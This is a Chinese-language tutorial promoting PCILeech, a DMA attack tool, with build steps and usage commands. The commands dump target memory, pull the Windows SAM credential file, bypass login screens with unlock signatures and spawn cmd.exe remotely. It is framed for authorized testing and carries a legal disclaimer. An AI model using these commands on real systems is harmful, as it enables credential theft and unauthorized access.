终极PCILeech使用指南：零基础掌握DMA内存攻击神器 🚀

PCILeech是一款强大的Direct Memory Access (DMA)攻击软件，通过PCI Express硬件设备实现对目标系统内存的直接读写。无需在目标系统安装驱动，即可通过硬件辅助或LeechCore库从远程系统实时捕获内存，支持Windows、Linux、FreeBSD等多操作系统，是网络安全研究者和渗透测试人员的必备工具。

📌 为什么选择PCILeech？三大核心优势解析

1️⃣ 跨平台兼容性：一站式支持多系统内存操作

PCILeech提供全平台解决方案，涵盖主流操作系统的内存读写功能：

• Windows系统：通过wx64_*系列脚本实现驱动加载、文件传输和进程管理
• Linux系统：lx64_*工具集支持文件操作与权限提升
• macOS系统：macos_*脚本提供内存访问与系统解锁功能
• FreeBSD系统：专用fbsdx64_*模块实现底层内存交互

2️⃣ 硬件级访问：突破传统安全边界的终极方案

利用PCIe设备的DMA特性，直接绕过操作系统安全机制：

• 支持USB3380等硬件设备（usb3380.md）
• 无需目标系统驱动支持，即插即用实现内存捕获
• 配合uefi_*模块可实现UEFI环境下的内存操作

3️⃣ 丰富功能集：从内存 dump 到文件系统访问

• 内存操作：完整内存转储、页面信息查询、内核模块分析
• 文件系统：通过VFS接口实现远程文件读写（vfs.c）
• 进程管理：列出进程、创建进程、结束进程等系统级操作
• 系统解锁：提供多种系统的密码绕过功能（unlock_*签名文件）

🛠️ 快速上手：PCILeech安装与配置全攻略

环境准备：兼容性与依赖检查

• Windows：需安装Dokan2文件系统库和Visual Studio编译环境
• Linux：需gcc、make等编译工具链（sudo apt install build-essential）
• macOS：Xcode命令行工具与相关开发依赖
• 硬件：推荐USB3380-based设备或兼容的PCIe DMA硬件

源码获取：安全高效的本地部署

git clone https://gitcode.com/gh_mirrors/pc/pcileech

编译步骤：平台专属构建指南

Linux/macOS系统编译

cd pcileech/pcileech
make -f Makefile

Windows系统编译

1. 打开解决方案文件：pcileech.sln
2. 选择目标平台（x64推荐）
3. 构建解决方案（Build Solution）

💻 核心功能实战：5分钟掌握关键操作

1️⃣ 内存 dump：完整捕获目标系统内存

./pcileech dump -out memory_dump.bin

配合-kmd参数可加载内核模块提升捕获效率（需指定模块地址）

2️⃣ 文件系统访问：远程读取目标文件

./pcileech filepull -r C:\Windows\system32\config\SAM

通过VFS虚拟文件系统实现远程文件读取，支持递归目录下载

3️⃣ 系统解锁：绕过密码登录界面

./pcileech unlock -sig files/unlock_win11x64.sig

支持Windows Vista至Windows 11各版本系统解锁（files/目录下提供多种签名）

4️⃣ 进程操作：远程管理目标系统进程

# 列出远程进程
./pcileech pslist

# 创建新进程
./pcileech pscreate -cmd "cmd.exe"

⚠️ 安全使用与法律声明

PCILeech仅用于授权的安全测试与研究目的：

• 使用前必须获得目标系统的明确授权
• 禁止用于任何非法活动或未授权访问
• 项目作者不对不当使用产生的后果负责

详细安全指南与法律声明请参考LICENSE文件。

📚 进阶学习资源

• 官方文档：readme.md提供完整功能说明
• 源码解析：核心功能实现位于pcileech/目录
• shellcode开发：自定义模块开发可参考pcileech_shellcode/
• 硬件指南：USB3380设备使用说明见usb3380.md

通过./pcileech --help命令可查看完整命令列表与参数说明，持续关注项目更新获取最新功能支持！